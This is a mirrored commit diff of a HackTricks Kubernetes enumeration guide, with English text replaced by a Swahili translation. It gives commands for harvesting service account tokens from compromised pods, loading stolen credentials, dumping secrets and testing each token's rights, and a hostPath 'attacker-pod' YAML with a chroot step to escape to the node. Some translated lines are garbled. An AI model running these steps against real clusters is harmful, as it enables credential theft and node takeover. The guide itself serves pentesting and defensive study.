gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-13 21:36:23 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:03:28 +00:00
parent 7770a50092
commit 44da2ea78f
244 changed files with 7940 additions and 10781 deletions
Download Patch File Download Diff File Expand all files Collapse all files

324
src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
View File

@@ -4,91 +4,86 @@
## Kubernetes Tokens
If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
Ikiwa umepata ufikiaji wa mashine, mtumiaji anaweza kuwa na ufikiaji wa jukwaa la Kubernetes. Token kawaida hupatikana katika faili inayotajwa na **env var `KUBECONFIG`** au **ndani ya `~/.kube`**.
In this folder you might find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved.
Katika folda hii unaweza kupata faili za usanidi zenye **tokens na usanidi wa kuungana na API server**. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.
If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
Ikiwa umepata ufikiaji wa pod ndani ya mazingira ya kubernetes, kuna maeneo mengine ambapo unaweza kupata tokens na taarifa kuhusu mazingira ya K8 ya sasa:
### Service Account Tokens
Before continuing, if you don't know what is a service in Kubernetes I would suggest you to **follow this link and read at least the information about Kubernetes architecture.**
Kabla ya kuendelea, ikiwa hujui ni nini huduma katika Kubernetes ningependekeza **ufuate kiungo hiki na usome angalau taarifa kuhusu usanifu wa Kubernetes.**
Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
Imechukuliwa kutoka kwa [nyaraka](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server) za Kubernetes:
_When you create a pod, if you do not specify a service account, it is automatically assigned the_ default _service account in the same namespace.”_
_Unapounda pod, ikiwa hujaeleza akaunti ya huduma, inatolewa kiotomatiki akaunti ya huduma_ default _katika namespace hiyo hiyo.”_
**ServiceAccount** is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.\
Every service account has a secret related to it and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties.
**ServiceAccount** ni kitu kinachosimamiwa na Kubernetes na kinatumika kutoa kitambulisho kwa michakato inayofanyika katika pod.\
Kila akaunti ya huduma ina siri inayohusiana nayo na hii siri ina bearer token. Hii ni JSON Web Token (JWT), njia ya kuwakilisha madai kwa usalama kati ya pande mbili.
Usually **one** of the directories:
Kawaida **moja** ya directories:
- `/run/secrets/kubernetes.io/serviceaccount`
- `/var/run/secrets/kubernetes.io/serviceaccount`
- `/secrets/kubernetes.io/serviceaccount`
contain the files:
zina faili:
- **ca.crt**: It's the ca certificate to check kubernetes communications
- **namespace**: It indicates the current namespace
- **token**: It contains the **service token** of the current pod.
- **ca.crt**: Ni cheti cha ca kuangalia mawasiliano ya kubernetes
- **namespace**: Inaonyesha namespace ya sasa
- **token**: Ina **service token** ya pod ya sasa.
Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`**
Sasa kwamba una token, unaweza kupata API server ndani ya variable ya mazingira **`KUBECONFIG`**. Kwa maelezo zaidi endesha `(env | set) | grep -i "kuber|kube`**`"`**
The service account token is being signed by the key residing in the file **sa.key** and validated by **sa.pub**.
Token ya akaunti ya huduma inasainiwa na funguo iliyoko katika faili **sa.key** na kuthibitishwa na **sa.pub**.
Default location on **Kubernetes**:
Mahali pa default kwenye **Kubernetes**:
- /etc/kubernetes/pki
Default location on **Minikube**:
Mahali pa default kwenye **Minikube**:
- /var/lib/localkube/certs
### Hot Pods
_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
_**Hot pods ni**_ pods zinazobeba token ya akaunti ya huduma yenye mamlaka. Token ya akaunti ya huduma yenye mamlaka ni token ambayo ina ruhusa ya kufanya kazi zenye mamlaka kama vile kuorodhesha siri, kuunda pods, n.k.
## RBAC
If you don't know what is **RBAC**, **read this section**.
Ikiwa hujui ni nini **RBAC**, **soma sehemu hii**.
## GUI Applications
- **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
- **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
- **k9s**: GUI inayoorodhesha klasta ya kubernetes kutoka kwa terminal. Angalia amri katika [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Andika `:namespace` na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
- **k8slens**: Inatoa siku chache za majaribio bure: [https://k8slens.dev/](https://k8slens.dev/)
## Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this:
Ili kuorodhesha mazingira ya K8s unahitaji kadhaa ya haya:
- A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
- The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
- **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
- **token ya uthibitisho halali**. Katika sehemu iliyopita tuliona wapi pa kutafuta token ya mtumiaji na token ya akaunti ya huduma.
- **anwani (**_**https://host:port**_**) ya Kubernetes API**. Hii inaweza kupatikana kawaida katika variable za mazingira na/au katika faili ya kube config.
- **Hiari**: **ca.crt ili kuthibitisha API server**. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha API server, lakini ukitumia `--insecure-skip-tls-verify` na `kubectl` au `-k` na `curl` hutahitaji hii.
With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host.
Kwa maelezo hayo unaweza **kuorodhesha kubernetes**. Ikiwa **API** kwa sababu fulani inapatikana kupitia **Mtandao**, unaweza tu kupakua taarifa hiyo na kuorodhesha jukwaa kutoka kwa mwenyeji wako.
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
Hata hivyo, kawaida **API server iko ndani ya mtandao wa ndani**, kwa hivyo utahitaji **kuunda tunnel** kupitia mashine iliyovunjika ili kuweza kufikia kutoka kwa mashine yako, au unaweza **kupakia** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, au tumia **`curl/wget/chochote`** kufanya maombi ya HTTP ya moja kwa moja kwa API server.
### Differences between `list` and `get` verbs
With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
Kwa **`get`** ruhusa unaweza kupata taarifa za mali maalum (_`describe` chaguo katika `kubectl`_) API:
```
GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}
```
If you have the **`list`** permission, you are allowed to execute API requests to list a type of asset (_`get` option in `kubectl`_):
Ikiwa una ruhusa ya **`list`**, unaruhusiwa kutekeleza maombi ya API ili orodhesha aina ya mali (_`get` chaguo katika `kubectl`_):
```bash
#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments
```
If you have the **`watch`** permission, you are allowed to execute API requests to monitor assets:
Ikiwa una ruhusa ya **`watch`**, unaruhusiwa kutekeleza maombi ya API ili kufuatilia mali:
```
GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
@@ -96,16 +91,14 @@ GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name} [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments [DEPRECATED]
GET /apis/apps/v1/watch/deployments [DEPRECATED]
```
They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created).
Wanafungua muunganisho wa utiririshaji ambao unakurudishia orodha kamili ya Manifest ya Deployment kila wakati inabadilika (au wakati mpya inaundwa).
> [!CAUTION]
> The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
> Amri zifuatazo za `kubectl` zinaonyesha jinsi ya kuorodhesha vitu. Ikiwa unataka kufikia data unahitaji kutumia `describe` badala ya `get`
### Using curl
From inside a pod you can use several env variables:
### Kutumia curl
Kutoka ndani ya pod unaweza kutumia mabadiliko kadhaa ya mazingira:
```bash
export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
@@ -115,28 +108,24 @@ export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve this.
```
> [!WARNING]
> By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
> Kwa kawaida pod inaweza **kufikia** **kube-api server** katika jina la kikoa **`kubernetes.default.svc`** na unaweza kuona mtandao wa kube katika **`/etc/resolv.config`** kwani hapa utapata anwani ya seva ya DNS ya kubernetes (".1" ya safu hiyo ni kiunganishi cha kube-api).
### Using kubectl
### Kutumia kubectl
Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
By default, The APISERVER is communicating with `https://` schema
Kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:
Kwa kawaida, APISERVER inawasiliana na muundo wa `https://`
```bash
alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces
```
> ikiwa hakuna `https://` katika url, unaweza kupata Kosa Kama Ombi Mbaya.
> if no `https://` in url, you may get Error Like Bad Request.
Unaweza kupata [**karatasi ya udanganyifu rasmi ya kubectl hapa**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio chaguzi tofauti za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji.
You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to.
To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
#### MitM kubectl - Proxyfying kubectl
Ili kupata ombi la HTTP ambalo `kubectl` inatuma unaweza kutumia parameter `-v=8`
#### MitM kubectl - Kuweka kubectl kwenye Proxy
```bash
# Launch burp
# Set proxy
@@ -145,12 +134,10 @@ export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true
```
### Current Configuration
### Mipangilio ya Sasa
{{#tabs }}
{{#tab name="Kubectl" }}
```bash
kubectl config get-users
kubectl config get-contexts
@@ -160,43 +147,37 @@ kubectl config current-context
# Change namespace
kubectl config set-context --current --namespace=<namespace>
```
{{#endtab }}
{{#endtabs }}
If you managed to steal some users credentials you can **configure them locally** using something like:
Ikiwa umeweza kuiba akiba za watumiaji, unaweza **kuziweka kwenye mfumo wako** kwa kutumia kitu kama:
```bash
kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )
```
### Pata Rasilimali Zinazoungwa Mkono
### Get Supported Resources
With this info you will know all the services you can list
Kwa habari hii utajua huduma zote unazoweza kuorodhesha
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace
```
{{#endtab }}
{{#endtabs }}
### Get Current Privileges
### Pata Haki za Sasa
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace
@@ -204,403 +185,336 @@ k auth can-i --list -n custnamespace #Get privileves in custnamespace
# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
```
{{#endtab }}
{{#endtabs }}
Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*
Njia nyingine ya kuangalia haki zako ni kutumia chombo: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*
You can learn more about **Kubernetes RBAC** in:
Unaweza kujifunza zaidi kuhusu **Kubernetes RBAC** katika:
{{#ref}}
kubernetes-role-based-access-control-rbac.md
{{#endref}}
**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
**Mara tu unavyojua ni haki zipi** unazo, angalia ukurasa ufuatao ili kubaini **kama unaweza kuzitumia vibaya** ili kupandisha haki:
{{#ref}}
abusing-roles-clusterroles-in-kubernetes/
{{#endref}}
### Get Others roles
### Pata Haki za Wengine
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get roles
k get clusterroles
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"
```
{{#endtab }}
{{#endtabs }}
### Get namespaces
### Pata majina ya maeneo
Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
Kubernetes inasaidia **vikundi vingi vya virtual** vinavyoungwa mkono na kundi moja la kimwili. Vikundi hivi vya virtual vinaitwa **majina ya maeneo**.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get namespaces
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/
```
{{#endtab }}
{{#endtabs }}
### Get secrets
### Pata siri
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get secrets -o yaml
k get secrets -o yaml -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
```
{{#endtab }}
{{#endtabs }}
If you can read secrets you can use the following lines to get the privileges related to each to token:
Ikiwa unaweza kusoma siri unaweza kutumia mistari ifuatayo kupata haki zinazohusiana na kila token:
```bash
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
```
### Pata Akaunti za Huduma
### Get Service Accounts
As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
Kama ilivyojadiliwa mwanzoni mwa ukurasa huu **wakati pod inatekelezwa, akaunti ya huduma kwa kawaida inatolewa kwake**. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kupandisha mamlaka.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get serviceaccounts
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
```
{{#endtab }}
{{#endtabs }}
### Get Deployments
### Pata Maendeleo
The deployments specify the **components** that need to be **run**.
Maendeleo yanaelezea **vipengele** ambavyo vinahitaji **kuendeshwa**.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get deployments
k get deployments -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
```
{{#endtab }}
{{#endtabs }}
### Get Pods
### Pata Pods
The Pods are the actual **containers** that will **run**.
Pods ni **containers** halisi ambazo zitafanya **kazi**.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get pods
k get pods -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
```
{{#endtab }}
{{#endtabs }}
### Get Services
### Pata Huduma
Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
Kubernetes **huduma** zinatumika ili **kuweka huduma wazi katika bandari na IP maalum** (ambayo itakuwa kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get services
k get services -n custnamespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/services/
```
{{#endtab }}
{{#endtabs }}
### Get nodes
### Pata voz
Get all the **nodes configured inside the cluster**.
Pata **voz zote zilizowekwa ndani ya klasta**.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get nodes
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/nodes/
```
{{#endtab }}
{{#endtabs }}
### Get DaemonSets
### Pata DaemonSets
**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
**DaeamonSets** inaruhusu kuhakikisha kwamba **pod maalum inafanya kazi katika nodi zote** za klasta (au katika zile zilizochaguliwa). Ikiwa utafuta DaemonSet, pods zinazodhibitiwa na hiyo pia zitaondolewa.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get daemonsets
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
```
{{#endtab }}
{{#endtabs }}
### Get cronjob
### Pata cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
Cron jobs inaruhusu kupanga kutumia sintaksia ya crontab uzinduzi wa pod ambayo itatekeleza hatua fulani.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get cronjobs
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
```
{{#endtab }}
{{#endtabs }}
### Get configMap
### Pata configMap
configMap always contains a lot of information and configfile that provide to apps which run in the kubernetes. Usually You can find a lot of password, secrets, tokens which used to connecting and validating to other internal/external service.
configMap daima ina habari nyingi na configfile ambazo zinatolewa kwa programu zinazotembea katika kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/nje.
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get configmaps # -n namespace
```
{{#endtab }}
{{#tab name="API" }}
```bash
kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
```
{{#endtab }}
{{#endtabs }}
### Get Network Policies / Cilium Network Policies
### Pata Sera za Mtandao / Sera za Mtandao za Cilium
{{#tabs }}
{{#tab name="First Tab" }}
{{#tab name="Tab ya Kwanza" }}
```bash
k get networkpolicies
k get CiliumNetworkPolicies
k get CiliumClusterwideNetworkPolicies
```
{{#endtab }}
{{#endtabs }}
### Get Everything / All
### Pata Kila Kitu / Yote
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get all
```
{{#endtab }}
{{#endtabs }}
### **Get all resources managed by helm**
### **Pata rasilimali zote zinazodhibitiwa na helm**
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'
```
{{#endtab }}
{{#endtabs }}
### **Get Pods consumptions**
### **Pata matumizi ya Pods**
{{#tabs }}
{{#tab name="kubectl" }}
```bash
k top pod --all-namespaces
```
{{#endtab }}
{{#endtabs }}
### Escaping from the pod
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
### Kutoroka kutoka kwenye pod
Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, badilisha kwenda kwenye pod iliyoundwa kisha chroot kwenye mfumo wa node. Unaweza kutumia pods zilizopo kama rejeleo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.
```bash
kubectl get pod <name> [-n <namespace>] -o yaml
```
> if you need create pod on the specific node, you can use following command to get labels on node
> ikiwa unahitaji kuunda pod kwenye nodi maalum, unaweza kutumia amri ifuatayo kupata lebo kwenye nodi
>
> `k get nodes --show-labels`
>
> Commonly, kubernetes.io/hostname and node-role.kubernetes.io/master are all good label for select.
Then you create your attack.yaml file
> Kwa kawaida, kubernetes.io/hostname na node-role.kubernetes.io/master ni lebo nzuri za kuchagua.
Kisha unaunda faili yako ya attack.yaml
```yaml
apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
namespace: default
labels:
run: attacker-pod
name: attacker-pod
namespace: default
spec:
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: ubuntu
imagePullPolicy: Always
name: attacker-pod
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
# kubernetes.io/hostname: master
# or using
# node-role.kubernetes.io/master: ""
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: ubuntu
imagePullPolicy: Always
name: attacker-pod
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
# kubernetes.io/hostname: master
# or using
# node-role.kubernetes.io/master: ""
```
[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
After that you create the pod
Baada ya hapo unaunda pod.
```bash
kubectl apply -f attacker.yaml [-n <namespace>]
```
Now you can switch to the created pod as follows
Sasa unaweza kubadilisha kwenda kwenye pod iliyoundwa kama ifuatavyo
```bash
kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
```
And finally you chroot into the node's system
Na hatimaye unachora ndani ya mfumo wa node.
```bash
chroot /root /bin/bash
```
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
## References
@@ -610,7 +524,3 @@ https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-metho
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}